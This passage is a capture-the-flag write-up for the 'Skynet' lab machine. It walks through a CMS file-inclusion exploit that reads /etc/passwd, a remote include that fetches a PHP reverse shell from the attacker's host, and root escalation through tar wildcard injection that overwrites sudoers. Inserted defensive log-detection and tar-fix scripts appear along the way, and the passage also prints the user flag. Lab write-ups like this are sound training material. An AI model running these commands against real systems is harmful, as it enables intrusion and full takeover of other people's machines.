I tried to exploit SquirrelMail, but it did not work, probably because of a misconfiguration or something else going wrong, so I moved on to the CMS exploit.

Finally I had success with the RFI and LFI using this exploit:

https://www.exploit-db.com/exploits/25971

It uses the file alertConfigField.php and its unsanitized GET parameter urlConfig:

http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php

I tested the exploit by leaking the sensitive system file /etc/passwd:

http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Field configuration:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false

So the next idea was to include a remote file from my computer containing a reverse shell. Knowing that the Skynet machine runs PHP, I just downloaded a reverse shell from here:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

I served it over HTTP with Python and also set up a nc listener:

python3 -m http.server 7777

nc -lvp 8889

Finally, triggering the file:

10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.😄:7777/shell2.php

listening on [any] 8889 ...
10.10.😄: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.😄] 54896
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 16:20:17 up  1:52,  0 users,  load average: 0.00, 0.06, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
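From the defender's side, the three web-side steps so far (the Hydra run against the SquirrelMail login, the /etc/passwd traversal through urlConfig, and the remote include of the reverse shell) all leave distinctive traces in the Apache access log. The script below is an added example, not part of the writeup and not code from the machine: it builds a few constructed log lines in Apache combined format (the addresses 10.9.0.5 and 10.9.0.9 are placeholders) and runs two awk rules over them, one flagging an IP that POSTs to the login handler at least a threshold number of times within one minute, the other flagging any request whose query string carries a traversal sequence or a URL scheme. The function names and the threshold are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the writeup: two awk rules over an Apache access
# log that catch the web-side events of this box. Log lines are constructed
# for the demo; 10.9.0.5 (attacker) and 10.9.0.9 (normal user) are placeholders.

sample_log() {
  # 12 POSTs to the SquirrelMail login handler from one IP inside one minute:
  # the footprint of a wordlist run like the Hydra command above.
  i=0
  while [ "$i" -lt 12 ]; do
    printf '10.9.0.5 - - [17/Jun/2021:22:30:%02d +0200] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 341 "-" "Mozilla/5.0"\n' "$((20 + i))"
    i=$((i + 1))
  done
  # Ordinary traffic: a page load and two logins from another address.
  printf '10.9.0.9 - - [17/Jun/2021:22:30:25 +0200] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2147 "-" "Mozilla/5.0"\n'
  printf '10.9.0.9 - - [17/Jun/2021:22:30:31 +0200] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 341 "-" "Mozilla/5.0"\n'
  printf '10.9.0.9 - - [17/Jun/2021:22:31:02 +0200] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 341 "-" "Mozilla/5.0"\n'
  # File-inclusion probes against the CMS: a traversal and a remote include.
  printf '10.9.0.5 - - [17/Jun/2021:23:05:10 +0200] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2890 "-" "Mozilla/5.0"\n'
  printf '10.9.0.5 - - [17/Jun/2021:23:07:41 +0200] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.0.5:7777/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"\n'
}

# Rule 1: at least $1 POSTs to the login handler from one IP within one
# minute. Combined-format fields: $1 client IP, $4 "[dd/Mon/yyyy:HH:MM:SS",
# $6 the quoted method, $7 the request path. Prints "ip minute count".
flag_login_bursts() {
  awk -v threshold="$1" '
    $6 == "\"POST" && $7 == "/squirrelmail/src/redirect.php" {
      count[$1 " " substr($4, 2, 17)]++     # key: ip + dd/Mon/yyyy:HH:MM
    }
    END { for (k in count) if (count[k] >= threshold) print k, count[k] }
  ' | sort
}

# Rule 2: a traversal sequence (plain or percent-encoded) or a URL scheme
# inside a request. Prints "ip request" for each hit; the URL-scheme form is
# what a remote include needs, and what allow_url_include=Off would stop.
flag_inclusion_probes() {
  awk '
    $7 ~ /\.\.\// || tolower($7) ~ /%2e%2e/ || tolower($7) ~ /=(https?|ftp|php|data):/ { print $1, $7 }
  '
}

# Stand-alone run: burst threshold of 10 attempts per minute.
sample_log | flag_login_bursts 10
sample_log | flag_inclusion_probes
```

On a real server the same two functions take the access log on stdin (`flag_login_bursts 10 < /var/log/apache2/access.log`); the burst rule keys on IP and minute, so a slow attacker spreading attempts across minutes needs a longer window, and the probe rule is deliberately broad and meant to be followed by a look at the matching requests, not treated as proof on its own.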

User flag:

$ cat user.txt
7ce5c2109a40f958099283600a9ae807
$ ls -lrta
total 4584
-rwxr-xr-x 1 root       root            74 Sep 17  2019 backup.sh
drwxr-xr-x 5 milesdyson milesdyson    4096 Sep 17  2019 ..
drwxr-xr-x 2 root       root          4096 Sep 17  2019 .
-rw-r--r-- 1 root       root       4679680 Jun 17 16:23 backup.tgz

4 - Post-Exploitation and privilege escalation

Now I have a low-privileged user. I started enumerating basic things; one of those was the crontab:

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Great: a cron job running every minute as root, using a shell script in milesdyson's home directory.

The shell script contains:

$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

This is good, because I have the user www-data, who can write to /var/www/html, and there is a known flaw when tar is run with a wildcard:

https://int0x33.medium.com/day-67-tar-cron-2-root-abusing-wildcards-for-tar-argument-injection-in-root-cronjob-nix-c65c59a77f5e

The approach is to make my low-privileged user a sudoer without a password in order to escalate privileges, setting up what the exploit describes in /var/www/html:

$ echo 'echo "www-data  ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh      
$ echo "" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "" > --checkpoint=1
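The flaw above is in the shell, not in tar: `*` is expanded by the shell before tar runs, so a file whose name starts with `--` arrives in tar's argument list and is parsed as an option. As an added example, not the machine's backup.sh, the script below reproduces the directory layout with a harmless option-looking filename (no exec action, so nothing runs) and compares the vulnerable form of the cron job with two safe ways to write the same backup: ending option parsing with `--`, or archiving the directory with `-C dir .` and no glob at all. The function names and the temporary directories are this example's own.

```shell
#!/bin/sh
# Added example (not the machine's backup.sh): why `tar cf archive *` is
# unsafe when untrusted users can create files in the directory, and two
# ways to write the same backup safely. Everything runs in temp dirs.

# Constructed input: a normal file plus one whose NAME looks like a tar
# option. Harmless here: no --checkpoint-action, so nothing is executed.
make_src_dir() {
  dir=$(mktemp -d)
  echo "<html>" > "$dir/index.html"
  : > "$dir/--checkpoint=1"
  printf '%s' "$dir"
}

# Count archive members whose name is the option-looking file.
# 0 means tar swallowed the name as an option instead of archiving it.
count_option_file() {            # $1 archive
  tar tf "$1" 2>/dev/null | grep -c -- '--checkpoint=1$' || true
}

# Vulnerable form, the shape of the cron job: the shell expands *, so tar
# receives "--checkpoint=1" as an argument and parses it as an option (GNU
# tar permutes options and operands). stderr is silenced because GNU tar
# prints checkpoint messages; on a non-GNU tar the call may simply fail.
backup_vulnerable() {            # $1 srcdir  $2 archive
  ( cd "$1" && tar cf "$2" * 2>/dev/null ) || true
}

# Fix 1: "--" ends option parsing; every later word is a path, whatever
# it starts with.
backup_dashdash() {              # $1 srcdir  $2 archive
  ( cd "$1" && tar cf "$2" -- * )
}

# Fix 2: no glob at all; tar archives the directory contents itself.
backup_no_glob() {               # $1 srcdir  $2 archive
  tar -C "$1" -cf "$2" .
}

run_demo() {
  src=$(make_src_dir)
  out=$(mktemp -d)
  backup_vulnerable "$src" "$out/vuln.tar"
  backup_dashdash   "$src" "$out/fix1.tar"
  backup_no_glob    "$src" "$out/fix2.tar"
  echo "vulnerable (tar cf *):  option-file archived $(count_option_file "$out/vuln.tar") time(s)"
  echo "fix 1 (tar cf -- *):    option-file archived $(count_option_file "$out/fix1.tar") time(s)"
  echo "fix 2 (tar -C dir .):   option-file archived $(count_option_file "$out/fix2.tar") time(s)"
  rm -rf "$src" "$out"
}

run_demo
```

The vulnerable form reports the option-looking file zero times (tar consumed it as `--checkpoint=1`), both fixes report it once, because it was stored as an ordinary member. The same reasoning is why a root cron job should never run a glob inside a directory a less privileged user can write to; `-C dir .` avoids the glob entirely, and `--` is the one-character patch when the glob has to stay.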

A few seconds later, after running date a few times to see how many seconds were left until the next minute on the system:

$ date
Thu Jun 17 16:28:55 CDT 2021
$ date
Thu Jun 17 16:28:57 CDT 2021
$ date
Thu Jun 17 16:28:58 CDT 2021
$ date
Thu Jun 17 16:28:59 CDT 2021
$ date
Thu Jun 17 16:29:00 CDT 2021
$ date

I could not use sudo from my shell because I had forgotten to upgrade it to a proper TTY with the trusty Python one-liner:

$ python -c 'import pty; pty.spawn("/bin/bash")'

After that I can use sudo without restrictions:

$ sudo bash

Rooted:

root@skynet:/var/www/html# id && whoami && uname -a
id && whoami && uname -a
uid=0(root) gid=0(root) groups=0(root)
root
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Thanks for reading!